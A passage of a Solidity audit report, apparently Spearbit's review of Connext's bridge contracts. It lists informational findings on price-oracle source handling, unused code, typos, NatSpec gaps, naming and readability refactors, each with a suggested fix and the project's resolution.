+5.5.45 Incorrect PriceSource is returned Severity: Informational Context: ConnextPriceOracle.sol#L97-L106 Description: The price source is returned incorrectly in the case of stale prices, as shown below: 1. The getTokenPrice function is called with _tokenAddress T1. 2. Assume the direct price is stale, so tokenPrice is set to 0. uint256 tokenPrice = assetPrices[tokenAddress].price; if (tokenPrice != 0 && ((block.timestamp - assetPrices[tokenAddress].updatedAt) <= VALID_PERIOD)) { return (tokenPrice, uint256(PriceSource.DIRECT)); } else { tokenPrice = 0; } 3. Now the contract tries to retrieve the price from the oracle. In case the price is outdated, the returned price will again be 0 and source will be set to PriceSource.CHAINLINK. if (tokenPrice == 0) { tokenPrice = getPriceFromOracle(tokenAddress); source = PriceSource.CHAINLINK; } 4. Assuming v1PriceOracle is not yet set, the contract will simply return the price and source, which in this case is 0, PriceSource.CHAINLINK. Here the amount is correct but the source is not. return (tokenPrice, uint256(source)); Recommendation: If the price remains 0, then the source returned should be PriceSource.NA. Connext: Solved in PR 2232. Spearbit: Verified.
+5.5.46 PriceSource.DEX is never used Severity: Informational Context: ConnextPriceOracle.sol#L58 Description: The enum value DEX is never used in the contract and can be removed. Recommendation: Remove DEX from the PriceSource enum: enum PriceSource { NA, DIRECT, CHAINLINK, V1_ORACLE } Connext: Solved in PR 2375. Spearbit: Verified.
+5.5.47 Incorrect comment about handleOutgoingAsset Severity: Informational Context: AssetLogic.sol#L61 Description: The comment is incorrect, as this function does not transfer funds to msg.sender. /** * @notice Handles transferring funds from the Connext contract to msg.sender. * @param _asset - The address of the ERC20 token to transfer. * @param _to - The recipient address that will receive the funds. * @param _amount - The amount to withdraw from contract. */ function handleOutgoingAsset( address _asset, address _to, uint256 _amount ) internal { Recommendation: Update the comment accordingly. Connext: Solved in PR 2221. Spearbit: Verified.
+5.5.48 SafeMath is not required for Solidity 0.8.x Severity: Informational Context: OZERC20.sol Description: Solidity 0.8.x has a built-in mechanism for dealing with overflows and underflows, so there is no need to use the SafeMath library. Recommendation: Consider removing SafeMath. Connext: Solved in PR 2350. Spearbit: Verified.
+5.5.49 Use a deadline check modifier in ProposedOwnable Severity: Informational Context: • ProposedOwnable.sol#L127-L129 • ProposedOwnable.sol#L151-L153 Description: Any change in ownership through acceptProposedOwner() and renounceOwnership() has to go through a deadline check: // Ensure delay has elapsed if ((block.timestamp - _proposedOwnershipTimestamp) <= _delay) revert ProposedOwnable__acceptProposedOwner_delayNotElapsed(); This check can be extracted into a modifier for readability. Recommendation: Replace the highlighted code with a modifier deadlineCheck: modifier deadlineCheck() { if ((block.timestamp - _proposedOwnershipTimestamp) <= _delay) revert ProposedOwnable__OwnershipChange_delayNotElapsed(); _; } Connext: Solved in PR 2494. Spearbit: Verified.
+5.5.50 Use ExcessivelySafeCall in SpokeConnector Severity: Informational Context: SpokeConnector.sol#L527-L550 Description: The highlighted low-level call code looks to be copied from ExcessivelySafeCall.sol. Recommendation: Consider replacing this low-level call with the function call ExcessivelySafeCall.excessivelySafeCall(). Connext: Solved in PR 2523. Spearbit: Verified.
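For reference on 5.5.50, a hedged sketch of the replacement call, assuming the original Nomad signature (target, gas, maxCopy, calldata); the local fork may additionally take a value parameter:

  (bool _success, bytes memory _returnData) = ExcessivelySafeCall.excessivelySafeCall(
    _target,
    gasleft() - 10_000, // reserve gas to handle the result; figure is illustrative
    256,                // cap on returndata bytes copied, preventing returndata-bombing
    _calldata
  );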
+5.5.51 s.LIQUIDITY_FEE_NUMERATOR might change while a cross-chain transfer is in-flight Severity: Informational Context: RoutersFacet.sol#L352 Description: s.LIQUIDITY_FEE_NUMERATOR might change while a cross-chain transfer is in-flight. Recommendation: Leave a note/warning for users that while their cross-chain transfers are in-flight, the liquidity fee might change, but it will always be less than or equal to 5%. Connext: Acknowledged. Spearbit: Acknowledged.
+5.5.52 The constant expression for EMPTY_HASH can be simplified Severity: Informational Context: BaseConnextFacet.sol#L17 Description: EMPTY_HASH is a constant with a value equal to hex"c5d2460186f7233c927e7db2dcc703c0e500b653ca82273b7bfad8045d85a470", which is the keccak256 of empty bytes. We can replace this constant hex literal with a more readable alternative. Recommendation: Use a constant expression such as keccak256(""), which is more readable and will also be inlined by the compiler. Connext: Solved in PR 2495. Spearbit: Verified.
+5.5.53 Simplify and add more documentation for getTokenPrice Severity: Informational Context: ConnextPriceOracle.sol#L83 Description: getTokenPrice can be simplified, and it can try to return early whenever possible. Recommendation: The following is a simplified version of getTokenPrice: function getTokenPrice(address _tokenAddress) public view override returns (uint256, uint256) { address tokenAddress = _tokenAddress; if (_tokenAddress == address(0)) { tokenAddress = wrapped; } uint256 tokenPrice = assetPrices[tokenAddress].price; if (tokenPrice != 0 && ((block.timestamp - assetPrices[tokenAddress].updatedAt) <= VALID_PERIOD)) { return (tokenPrice, uint256(PriceSource.DIRECT)); } tokenPrice = getPriceFromOracle(tokenAddress); if (tokenPrice != 0) { return (tokenPrice, uint256(PriceSource.CHAINLINK)); } if (v1PriceOracle != address(0)) { tokenPrice = IPriceOracle(v1PriceOracle).getTokenPrice(tokenAddress); if (tokenPrice != 0) { return (tokenPrice, uint256(PriceSource.V1_ORACLE)); } } return (0, uint256(PriceSource.NA)); } It would also be great to document/comment that this function tries to source the price from different sources in the following order: 1. From the current contract storage / directly (data set by the owner). 2. From a Chainlink aggregator. 3. From the v1PriceOracle, if set. Connext: Solved in PR 2344. Spearbit: Verified.
+5.5.54 Remove unused code, files, interfaces, libraries, contracts, ... Severity: Informational Context: Mentioned in Recommendation Description: The codebase includes code, files, interfaces, libraries, and contracts that are no longer in use. Recommendation: It would be best to remove unused code to declutter the codebase. • IGasTokenOracle.sol#L4 : IGasTokenOracle is an unused interface. • ITokenExchange.sol#L9 : ITokenExchange is an unused interface. • ConnextPriceOracle.sol#L22 : The getRoundData function is unused. This interface looks to have been copied from Chainlink's AggregatorV3Interface.sol; it might also be best to move it to the interfaces folder and create a file for it. • ConnextPriceOracle.sol#L72-L73 : Unused events NewAdmin and PriceRecordUpdated. • Multicall.sol#L7 : Unused contract Multicall. • BridgeToken.sol#L7-L8 : Unused import of BridgeMessage. • BaseConnextFacet.sol#L21 : Unused error BaseConnextFacet__onlyBridgeRouter_notBridgeRouter. • BridgeFacet.sol#L43 : Unused error BridgeFacet__xcall_notSupportedAsset. • BridgeFacet.sol#L45 : Unused error BridgeFacet__xcall_canonicalAssetNotReceived. • InboxFacet.sol#L38 : Unused error InboxFacet__reconcile_notConnext. • TokenFacet.sol#L21 : Unused error TokenFacet__addAssetId_nativeAsset. • RootManager.sol#L8 : Unused import of Message. • TypedMemView.sol#L401-L403 : Unused function sameType. • TypeCasts.sol#L10 : Unused function coerceBytes32. • TypeCasts.sol#L15 : Unused function coerceString. Connext: Solved in PR 2502. Spearbit: Verified.
+5.5.55 _calculateSwapInv and _calculateSwap can mirror each other's calculations Severity: Informational Context: • SwapUtils.sol#L579-L580 • SwapUtils.sol#L543-L544 Description: _calculateSwapInv could have mirrored the implementation of _calculateSwap: uint256 y = xp[tokenIndexTo] - (dy * multipliers[tokenIndexTo]); uint256 x = getY(_getAPrecise(self), tokenIndexTo, tokenIndexFrom, y, xp); Or, the other way around, _calculateSwap could mirror _calculateSwapInv; pick whichever is cheaper. Recommendation: Consider simplifying the code by mirroring the implementation. Connext: Acknowledged. Spearbit: Acknowledged.
+5.5.56 Document that the virtual price of a stable swap pool might not be constant Severity: Informational Context: SwapUtils.sol#L403 Description: The virtual price of the LP token is not constant while the amplification coefficient is ramping, even when/if token balances stay the same. Recommendation: Document this issue for users and devs. Connext: Acknowledged. Spearbit: Acknowledged.
+5.5.57 Document the reason for picking d as the starting point for calculating getYD using Newton's method Severity: Informational Context: SwapUtils.sol#L285 Description: d, the stable swap invariant, is passed to getYD as a parameter and used as the starting point of the Newton method to find a root. This root is the value/price of the tokenIndex token that would stabilize the pool so that it satisfies the stable swap invariant equation. Recommendation: It would be great to leave a comment documenting the reasoning behind why d was selected as the starting point. Connext: Comment added in PR 2381. Spearbit: Verified.
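For reference on 5.5.57, a hedged sketch of the underlying math (following the Curve/Saddle-style getYD implementations this code appears to derive from): getYD solves a quadratic in the unknown balance y,

  f(y) = y^2 + (b - d) y - c = 0,

and its loop is exactly the Newton step for that quadratic,

  y_{k+1} = y_k - f(y_k) / f'(y_k) = (y_k^2 + c) / (2 y_k + b - d),   with y_0 = d,

where b and c are derived from the other balances and the amplification coefficient. Since f is an upward-opening parabola, a Newton iteration started at or above the positive root converges monotonically toward it; documenting why y_0 = d is such a starting point would address this finding.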
+5.5.59 Rename adoptedToLocalPools to better indicate what it represents Severity: Informational Context: LibConnextStorage.sol#L152 Description: adoptedToLocalPools is used to keep track of external pools where one can swap between different variations of a token. But one might confuse this mapping as holding internal stable swap pools. Recommendation: To avoid confusion it would be best to rename this field to a name that better indicates what it represents (for example, externalPools or adoptedToLocalExternalPools). It is really important to mention that this is a mapping of external pools used by the protocol. Note, these external pools are only used when there are no internal pools for a token variation. Connext: Solved in PR 2358. Spearbit: Verified. 134 +5.5.60 Document the usage of commented mysterious numbers in AppStorage Severity: Informational Context: LibConnextStorage.sol#L120 Description: Before each struct AppStorage's field definition there is a line comment consisting of only digits // xx One would guess they might be relative slot indexes in the storage (relative to AppStorage's slot). But the numbers are not consistent. Recommendation: It would be best to add further comments as to what they mean. And if they do represent relative storage slots, some of those would need to be corrected. Connext: Acknowledged. Spearbit: Acknowledged. +5.5.61 RouterPermissionsManagerInfo can be packed differently for readability Severity: Informational Context: LibConnextStorage.sol#L111-L118 Description: RouterPermissionsManagerInfo has multiple fields that are each a mapping of address to a differ- ent value. The address here represents a liquidity router address. It would be more readable to pack these values such that only one mapping is used. This would also indicate how all these mapping have the same shared key which is the router. Recommendation: The RouterPermissionsManagerInfo can be changed into routerInfos // note this would pack tighter in storage struct RouterInfos { bool approved; bool approvedForPortals; address recipient; address owner; address proposedOwner; uint256 proposedTimestamp; } ... // field in AppStorage mapping(address => RouterInfo) routerInfos; Note: This suggestion only applies to new deployments and not to the case when upgrading the contract. Connext: This should be done in a separate PR, where we manage the configuration separately. See con- next/nxtp@6fdac03. Spearbit: Verified. 135 +5.5.62 Consolidate TokenId struct into a file that can be imported in relevant files Severity: Informational Context: • BridgeMessage.sol#L39-L42 • LibConnextStorage.sol#L38-L41 Description: TokenId struct is defined both in BridgeMessage and LibConnextStorage with the same struc- ture/fields. If in future, one would need to update one struct the other one should also be updated in parallel. Recommendation: To avoid syncing issues, it is recommended to either import TokenId from one of the files into the other or extract TokenId into a shared file that can be imported to both of the mentioned files. Connext: Solved in PR 2496. Spearbit: Verified. +5.5.63 Typos, grammatical and styling errors Severity: Informational Context: Mentioned in Recommendation Description: There are a few typos and grammatical mistakes that can be corrected in the codebase. Recommendation: • AssetLogic.sol#L527 : recieved should be received • LibConnextStorage.sol#L154 : missing the - * @notice Mapping of whitelisted assets on same domain as contract. 
+5.5.63 Typos, grammatical and styling errors Severity: Informational Context: Mentioned in Recommendation Description: There are a few typos and grammatical mistakes that can be corrected in the codebase. Recommendation: • AssetLogic.sol#L527 : recieved should be received. • LibConnextStorage.sol#L154 : missing "the": - * @notice Mapping of whitelisted assets on same domain as contract. + * @notice Mapping of whitelisted assets on the same domain as the contract. • LibDiamond.sol#L98 : typos, befor should be before and elpases should be elapses: - // period or befor the delay elpases + // period or before the delay elapses • ConnextPriceOracle.sol#L126 : typo, > should be <: - // answeredInRound > roundId ===> ChainLink Error: Stale price + // answeredInRound < roundId ===> ChainLink Error: Stale price • TokenFacet.sol#L290 : typo, _adooted should be _adopted. • ProposedOwnableFacet.sol#L160 : typo, sounce should be source. • ProposedOwnableFacet.sol#L273 : typo, assingned should be assigned. • RelayerFacet.sol#L71-L72 : typo, router should be relayer fee vault: - * @notice Updates the relayer fee router - * @param _relayerFeeVault The address of the new router + * @notice Updates the relayer fee vault + * @param _relayerFeeVault The address of the new relayer fee vault • IArbitrumInbox.sol#L5 : typo, messagesto should be messages to. • IArbitrumOutbox.sol#L5 : typo, messagesto should be messages to. • IArbitrumOutbox.sol#L32-L34 : usage of /// is not consistent with other comment blocks. • Connector.sol#L87 : typo, HubConnector should be Connector. • ArbitrumHubConnector.sol#L128 : typo, none should be node's. • GnosisHubConnector.sol#L49 : typo, l1 should be l2. • RoutersFacet.sol#L194 : confusing comment: - * @notice Returns the approved router for the given router address + * @notice Returns whether a given router address is approved or not • RoutersFacet.sol#L197 : getRouterApproval can be renamed to isApprovedRouter. • RoutersFacet.sol#L251 : getRouterApprovalForPortal can be renamed to isRouterApprovedForAavePortal. • PriceOracle.sol#L15 : add named return parameters for clarity and update the @return NatSpec accordingly: function getTokenPrice(address token) external view virtual returns (uint256 price, uint256 source); Connext: Partly solved in PR 2297. We'll fix the rest later on. Spearbit: Acknowledged.
+5.5.64 Keep consistent return parameters in calculateSwapToLocalAssetIfNeeded Severity: Informational Context: AssetLogic.sol#L392-L394 Description: All return paths in calculateSwapToLocalAssetIfNeeded except one return _local as the 2nd return parameter. For readability and consistency, it would be best to change the following code to follow the same pattern: if (_asset == _local) { return (_amount, _asset); } Recommendation: Change the above few lines to: if (_local == _asset) { return (_amount, _local); } Connext: Solved in PR 2357. Spearbit: Verified.
+5.5.65 Fix/add or complete missing NatSpec comments Severity: Informational Context: Mentioned in Recommendation Description: Some NatSpec comments are either missing or incomplete. Recommendation: Add or complete missing NatSpec comments. • AssetLogic.sol#L184-L205 : missing the @return NatSpec for the 1st return parameter, of type bool. • LibConnextStorage.sol#L113 : missing NatSpec comment for approvedForPortalRouters. Note this field is used to query the approved liquidity routers that can borrow from an Aave Portal. • SwapUtils.sol#L137-L145 : it would be best to have the NatSpec @param comments in the same order as the parameters supplied to the function. • IXReceiver.sol#L5 : IXReceiver is missing NatSpec and is a crucial component of the protocol. The following should be specially documented:
• IDiamondCut.sol#L51 : We are not proposing here. This is a @notice for rescindDiamondCut. • ProposedOwnableFacet.sol#L125-L127 : The delay() is also used for other proposals, not only changing the ownership (removing asset or router whitelists). • RelayerFacet.sol#L26-L27 : Make the comments more specific - * @notice Emitted when a relayer is added or removed from whitelists - * @param relayer - The relayer address to be added or removed + * @notice Emitted when a relayer is added to the whitelists + * @param relayer - The relayer address to be added • RelayerFacet.sol#L33-L34 : Make the comments more specific - * @notice Emitted when a relayer is added or removed from whitelists - * @param relayer - The relayer address to be added or removed + * @notice Emitted when a relayer is removed from the whitelists + * @param relayer - The relayer address to be removed • StableSwapFacet.sol#L242: Missing NatSpec comments for minAmountOut and deadline parameters. • StableSwapFacet.sol#L266: Missing NatSpec comments for maxAmountIn and deadline parameters. • StableSwap.sol#L347: Missing NatSpec comments for deadline parameter. • StableSwap.sol#L366: Missing NatSpec comments for deadline parameter. • IConnectorManager.sol#L18-L21 : home() returns an IOutbox interface, but in the NatSpec comments there is only a mention of local inbox contract. • BridgeFacet.sol#L147-L153 : Clarifiy that in the NatSpec, instance refers to a connext remote xApp router instance. And perhaps the event name RemoteAdded and its second input parameter's name address remote can be renamed accordingly. • BridgeMessage.sol#L178-L183 : Document whether evmId is being called by some off-chain agent. Other- wise this function has not being used in the codebase and can possibly be removed. Connext: Acknowledged. Spearbit: Acknowledged. +5.5.66 Define and use constants for different literals used in the codebase. Severity: Informational Context: • AssetLogic.sol#L180 • AssetLogic.sol#L260 • AssetLogic.sol#L330 • AssetLogic.sol#L528 Description: Throughout the project, a few literals have been used. It would be best to define a named constant for those. That way it would be more clear the purpose of those values used and also the common literals can be consolidated into one place. Recommendation: • AssetLogic.sol#L180 : Define a named constant for uint8(18). 138 • AssetLogic.sol#L260, AssetLogic.sol#L330 : 3600 could be a constant ONE_HOUR. • AssetLogic.sol#L528 : define a named constant for 10_000. Connext: Solved in PR 2497. Spearbit: Verified. +5.5.67 Enforce using adopted for the returned parameter in swapFromLocalAssetIfNeeded... for consis- tency. Severity: Informational Context: • AssetLogic.sol#L162 • AssetLogic.sol#L212 • AssetLogic.sol#L355 Description: The other return paths in swapFromLocalAssetIfNeeded, swapFromLocalAssetIfNeededForEx- actOut and calculateSwapFromLocalAssetIfNeeded use the adopted parameter as one of the return value com- ponents. It would be best to have all the return paths do the same thing. Note swapFromLocalAssetIfNeeded and calculateSwapFromLocalAssetIfNeeded should always return (_, adopted) and swapFromLocalAssetIfNeededForExactOut should always return (_, _, adopted). Recommendation: Change // swapFromLocalAssetIfNeeded address adopted = s.canonicalToAdopted[_key]; if (adopted == _asset) { return (_amount, _asset); } ... // swapFromLocalAssetIfNeededForExactOut address adopted = s.canonicalToAdopted[_key]; if (adopted == _asset) { return (true, _amount, _asset); } ... 
// calculateSwapFromLocalAssetIfNeeded // If the adopted asset is the local asset, no need to swap. address adopted = s.canonicalToAdopted[_key]; if (adopted == _asset) { return (_amount, _asset); } To 139 // swapFromLocalAssetIfNeeded address adopted = s.canonicalToAdopted[_key]; if (adopted == _asset) { return (_amount, adopted); // <--- changed line } ... // swapFromLocalAssetIfNeededForExactOut address adopted = s.canonicalToAdopted[_key]; if (adopted == _asset) { return (true, _amount, adopted); // <--- changed line } ... // calculateSwapFromLocalAssetIfNeeded // If the adopted asset is the local asset, no need to swap. address adopted = s.canonicalToAdopted[_key]; if (adopted == _asset) { return (_amount, adopted); // <--- changed line } Connext: Solved in PR 2356. Spearbit: Verified. +5.5.68 Use interface types for parameters instead of casting to the interface type multiple times Severity: Informational Context: • AssetLogic.sol#L38-L58 Description: Sometimes casting to the interface type has been performed multiple times. It will be cleaner if the parameter is defined as having that interface and avoid unnecessary casts. Recommendation: Change the input parameter type of _asset from address to IERC20 in handleIncomingAsset: 140 using SafeERC20 for IERC20; ... function handleIncomingAsset(IERC20 _asset, uint256 _amount) internal { // Sanity check: if amount is 0, do nothing. if (_amount == 0) { return; } // Sanity check: asset address is not zero. if (address(_asset) == address(0)) { revert AssetLogic__handleIncomingAsset_nativeAssetNotSupported(); } // Record starting amount to validate correct amount is transferred. uint256 starting = _asset.balanceOf(address(this)); // Transfer asset to contract. _asset.safeTransferFrom(msg.sender, address(this), _amount); // Ensure correct amount was transferred (i.e. this was not a fee-on-transfer token). if (_asset.balanceOf(address(this)) - starting != _amount) { revert AssetLogic__handleIncomingAsset_feeOnTransferNotSupported(); } } Also, note that we added using SafeERC20 for IERC20; which can be used for all other transfer functions IERC20 types in this library. Connext: Solved in PR 2498. Spearbit: Verified. +5.5.69 Be aware of tokens with multiple addresses Severity: Informational Context: RoutersFacet.sol#L536-L571 Description: If a token has multiple addresses (see weird erc20) then the token cap might have an unexpected effect, especially if the two addresses have a different cap. function _addLiquidityForRouter(...) ... { ... if (s.domain == canonical.domain) { // Sanity check: caps not reached uint256 custodied = IERC20(_local).balanceOf(address(this)) + _amount; uint256 cap = s.caps[key]; if (cap > 0 && custodied > cap) { revert RoutersFacet__addLiquidityForRouter_capReached(); } } ... } Recommendation: For tokens with multiple addresses: whitelist only one address or have the same caps is multiple addresses are whitelistes. Connext: Acknowledged. Spearbit: Acknowledged. 141 +5.5.70 Remove old references to claims Severity: Informational Context: RelayerFacet.sol#L13-L14, RelayerFacet.sol#L46-L54 Description: The contract RelayerFacet still has some references to claims. These are a residue from a previous version and are not used currently. error RelayerFacet__initiateClaim_emptyClaim(); error RelayerFacet__initiateClaim_notRelayer(bytes32 transferId); event InitiatedClaim(uint32 indexed domain, address indexed recipient, address caller, bytes32[] transferIds); ,! 
event Claimed(address indexed recipient, uint256 total, bytes32[] transferIds); Recommendation: Remove the following: -error RelayerFacet__initiateClaim_emptyClaim(); -error RelayerFacet__initiateClaim_notRelayer(bytes32 transferId); -event InitiatedClaim(uint32 indexed domain, address indexed recipient, address caller, bytes32[] transferIds); ,! -event Claimed(address indexed recipient, uint256 total, bytes32[] transferIds); Connext: Removed. Spearbit: Verified. +5.5.71 Doublecheck references to Nomad Severity: Informational Context: Connext contracts Description: The code refers to nomad several times in a way that is currently not accurate. This could be confusing to the maintainers and readers of the code. This includes the following examples: BridgeFacet.sol:419: * @notice Initiates a cross-chain transfer of funds, calldata, and/or various named properties using the nomad ,! BridgeFacet.sol:423: * assets will be swapped for their local nomad asset counterparts (i.e. bridgeable tokens) via the configured AMM if swap is needed. The local tokens will * necessary. In the event that the adopted assets *are* local nomad assets, no ,! BridgeFacet.sol:424: ,! InboxFacet.sol:87: RoutersFacet.sol:533: AssetLogic.sol:102: asset. ,! AssetLogic.sol:139: swap ,! AssetLogic.sol:185: swap ,! AssetLogic.sol:336: adopted asset ,! AssetLogic.sol:375: * @notice Only accept messages from an Nomad Replica contract. * @param _local - The address of the nomad representation of the asset * @notice Swaps an adopted asset to the local (representation or canonical) nomad * @notice Swaps a local nomad asset for the adopted asset using the stored stable * @notice Swaps a local nomad asset for the adopted asset using the stored stable * @notice Calculate amount of tokens you receive on a local nomad asset for the * @notice Calculate amount of tokens you receive of a local nomad asset for the adopted asset ,! LibConnextStorage.sol:54: * @param receiveLocal - If true, will use the local nomad asset on the destination instead of adopted. ,! LibConnextStorage.sol:148: madUSDC on polygon). ,! LibConnextStorage.sol:204: LibConnextStorage.sol:268: madUSDC on polygon) * @dev Swaps for an adopted asset <> nomad local asset (i.e. POS USDC <> * this domain (the nomad local asset). * @dev Swaps for an adopted asset <> nomad local asset (i.e. POS USDC <> ,! ConnectorManager.sol:11: * @dev Each nomad router contract has a `XappConnectionClient`, which ,! references a 142 Recommendation: Doublecheck the references to Nomad. Connext: Solved in PR 2216. Spearbit: Verified. +5.5.72 Document usage of Nomad domain schema Severity: Informational Context: LibConnextStorage.sol#L49-L50, BridgeFacet.sol#L258, BridgeFacet.sol#L291, IXReceiver.sol#L5 Description: The library LibConnextStorage specifies that the domains are compatible with the nomad domain schema. However other locations don't mention this. This is especially important during the enrollment of new domains. * @param originDomain - The originating domain (i.e. where `xcall` is called). Must match nomad domain schema ,! * @param destinationDomain - The final domain (i.e. where `execute` / `reconcile` are called). Must match nomad domain schema ,! struct TransferInfo { uint32 originDomain; uint32 destinationDomain; ... } Recommendation: Where relevant document the domain schema. This should include xcall(), xcallIntoLo- cal(), xReceive(). Connext: Acknowledged. Spearbit: Acknowledged. 
+5.5.73 Router has multiple meanings Severity: Informational Context: RoutersFacet.sol#L16, LibConnextStorage.sol#L18, InboxFacet.sol#L217 Description: The term router is used for three different concepts. This is confusing for maintainers and readers of the code: A) The router that provides Liquidity and signs bids * `router` - this is the address that will sign bids sent to the sequencer B) The router that can add new routers of type A (B is a role and the address could be a multisig) /// @notice Enum representing address role enum Role { None, Router, Watcher, Admin } C) The router that what previously was BridgeRouter or xApp Router: * @param _router The address of the potential remote xApp Router Recommendation: Change the names to make them more clear, for example: • A Router -> LiquidityRouter • B Router -> LiquidityRouterWhitelistManager 143 • C Router -> XappRouter Connext: Solved in PR 2500. Spearbit: Verified. +5.5.74 Robustness of receiving contract Severity: Informational Context: BridgeFacet.sol#L785-L840, BridgeFacet.sol#L756-L770 Description: In the _reconciled branch of the code, the functions _handleExecuteTransaction(), _execute- Calldata() and excessivelySafeCall() don't revert when the underlying call reverts This seems to be inten- tional. This underlying revert can happen if there is a bug in the underlying call or if insufficient gas is supplied by the relayer. Note: if a delegate address is specified it can retry the call to try and fix temporary issues. The receiving contract already has received the tokens via handleOutgoingAsset() so must be prepared to handle these tokens. This should be explicitly documented. function _handleExecuteTransaction(...) ... { AssetLogic.handleOutgoingAsset(_asset, _args.params.to, _amountOut); _executeCalldata(_transferId, _amountOut, _asset, _reconciled, _args.params); ... } function _executeCalldata(...) ... { if (_reconciled) { ... (success, returnData) = ExcessivelySafeCall.excessivelySafeCall(...); } else { ... } } Recommendation: Document that the called contract must be so robust it can handle received tokens, even when its function reverts. Connext: Acknowledged. Spearbit: Acknowledged. +5.5.75 Functions can be combined Severity: Informational Context: BridgeFacet.sol#L258-L322 Description: Both xcall and xcallIntoLocal have same code except receiveLocal (which is set false for xcall and true for xcallIntoLocal) value. Instead of having these as separate function, a single function can be created which can tweak the functionalities of xcall and xcallIntoLocal on basis of receiveLocal value Recommendation: Remove the xcallIntoLocal function and revise the xcall function as below: 144 function xcall( uint32 _destination, address _to, address _asset, address _delegate, uint256 _amount, uint256 _slippage, bytes calldata _callData, bool _receiveLocal ) external payable returns (bytes32) { ... receiveLocal: _receiveLocal, ... } Connext: We chose to not clutter the xcall interface with this param. Spearbit: Acknowledged. +5.5.76 Document source of zeroHashes Severity: Informational Context: Merkle.sol#L173-L241 Description: The hashes which are used in function zeroHashes() are not explained, which makes it more difficult to understand and verify the code. function zeroHashes() internal pure returns (bytes32[TREE_DEPTH] memory _zeroes) { ... // keccak256 zero hashes bytes32 internal constant Z_0 = hex"0000000000000000000000000000000000000000000000000000000000000000"; ... 
bytes32 internal constant Z_31 = hex"8448818bb4ae4562849e949e17ac16e0be16688e156b5cf15e098c627c0056a9"; ,! ,! } Recommendation: Document where the constants are derived from. Here is an algorithm that generates them: //SPDX-License-Identifier: MIT pragma solidity 0.8.13; import "hardhat/console.sol"; contract Generate { uint constant DEPOSIT_CONTRACT_TREE_DEPTH = 32; bytes32[DEPOSIT_CONTRACT_TREE_DEPTH] zero_hashes; constructor() { console.logBytes32(zero_hashes[0]); // Compute hashes in empty sparse Merkle tree for (uint height = 0; height < DEPOSIT_CONTRACT_TREE_DEPTH - 1; height++) { zero_hashes[height + 1] = keccak256(abi.encodePacked(zero_hashes[height], ,! zero_hashes[height])); console.logBytes32(zero_hashes[height + 1]); } } } Or use this as documentation: 145 // keccak256 zero hashes bytes32 internal constant bytes32 internal constant ... bytes32 internal constant Z_31 = keccak256(abi.encodePacked(Z_30, Z_30)); } Z_0 = bytes32(0); Z_1 = keccak256(abi.encodePacked( Z_0, Z_0)); Or this: Z_i represent the hash values at different heights for a binary tree with leaf values equal to `0`. Z_i = keccak256(abi.encodePacked(Z_{i-1}, Z_{i-1})); Also add a reference in the comments to the verification of the original code. Connext: Solved in PR 2211. Spearbit: Verified. +5.5.77 Document underflow/overflows in TypedMemView Severity: Informational Context: TypedMemView.sol#L559-L582, TypedMemView.sol#L204-L210 == 32 and function leftMask() has an un- Description: The function index() has an overflow when _bytes derflow when _len == 0. These two compensate each other so the end result of index() is as expected. As the special case for _bytes == 0 is also handled, we assume this is intentional. However this behavior isn't mentioned in the comments, while other underflow/overflows are documented. library TypedMemView { function index( bytes29 memView, uint256 _index, uint8 _bytes ) internal pure returns (bytes32 result) { ... unchecked { uint8 bitLength = _bytes * 8; } ... } function leftMask(uint8 _len) private pure returns (uint256 mask) { ... mask := sar( sub(_len, 1), ... ... ) } } Recommendation: Add comments about underflow/overflows, for example on the following locations: 146 library TypedMemView { function index( bytes29 memView, uint256 _index, uint8 _bytes ) internal pure returns (bytes32 result) { ... unchecked { uint8 bitLength = _bytes * 8; // is 0 when _bytes == 32 } ... } function leftMask(uint8 _len) private pure returns (uint256 mask) { ... mask := sar( sub(_len, 1), ... ) ... // underflows when _len == 0 } } Connext: Acknowledged. Spearbit: Acknowledged. +5.5.78 Use while loops in dequeueVerified() Severity: Informational Context: Queue.sol#L59-L102 Description: Within function dequeueVerified() there are a few for loops that mention a variable as there first element. This is a null statement and can be removed. After removing, only a while condition remains. Replacing the for with a while would make the code more readable. Also (x >= y) can be replaced by (!(x < y)) or (!(y > x)) to save some gas. function dequeueVerified(Queue storage queue, uint256 delay) internal returns (bytes32[] memory) { ... for (last; last >= first; ) { ... } ... for (first; first <= last; ) { ... } } Recommendation: Replace the for loops with while loops: -for (last; last >= first; ) { ... } +while (!(first > last)) { ... } Connext: Solved in PR PR 2228 and PR 2550. Spearbit: Verified. 
147 +5.5.79 Duplicate functions in Encoding.sol Severity: Informational Context: Encoding.sol#L35-L74, TypedMemView.sol#L72-L168 Description: Encoding.sol defines a few functions already present in TypedMemView.sol: nibbleHex(), byte- Hex(), encodeHex(). Recommendation: Consider removing nibbleHex(), byteHex() and encodeHex() from both the files as custom errors can be used instead. Connext: Fixed in PR 2499. Spearbit: Verified. +5.5.80 Document about two MerkleTreeManager's Severity: Informational Context: messaging/Merkle.sol Description: On the hub domain (e.g. mainnet) there are two MerkleTreeManagers, one for the hub and one for the MainnetSpokeConnector. This might not be obvious to the casual readers of the code. Accidentally confusing the two would lead to weird issues. Recommendation: Add a comment in the code explaining there are two MerkleTreeManagers on the hub domain. Connext: Added a comment in PR 2438. Spearbit: Verified. +5.5.81 Match filename to contract name Severity: Informational Context: messaging/Merkle.sol#L11, messaging/libraries/Merkle.sol#L9, ProposedOwnable.sol#L28, Propose- dOwnable.sol#L176 OZERC20.sol#L48 Description: Sometimes the name of the .sol file is different than the contract name. Also sometimes multiple contracts are defined in the same file. Additionally there are multiple .sol files with the same name. This makes it more difficult to find the file containing the contract. File: messaging/Merkle.sol contract MerkleTreeManager is ProposedOwnableUpgradeable { ... } File: messaging/libraries/Merkle.sol library MerkleLib { ... } File: ProposedOwnable.sol abstract contract ProposedOwnable is IProposedOwnable { ... } abstract contract ProposedOwnableUpgradeable is Initializable, ProposedOwnable { ... } File: OZERC20.sol 148 contract ERC20 is IERC20, IERC20Permit, EIP712 { ... } Recommendation: Split up files containing multiple contracts and match the filename to the contract name. For example: • messaging/Merkle.sol => MerkleTreeManager.sol • messaging/libraries/Merkle.sol => MerkleLib.sol • ProposedOwnable.sol => split in ProposedOwnable.sol and ProposedOwnableUpgradeable.sol • OZERC20.sol => perhaps keep it because this based on an OpenZeppelin contract Connext: Solved in PR 2441. Spearbit: Verified. +5.5.82 Use uint40 for type in TypedMemView Severity: Informational Context: TypedMemView.sol#L347 Description: All internal functions in TypedMemView use uint40 for type except build(). Since internal functions can be called by inheriting contracts, it's better to provide a consistent interface. Recommendation: Change type from uint256 to uint40 in build() function build( - + uint256 _type, uint40 _type, uint256 _loc, uint256 _len Connext: Leaving as is in original library. Spearbit: Acknowledged. +5.5.83 Comment in function typeOf() is inaccurate 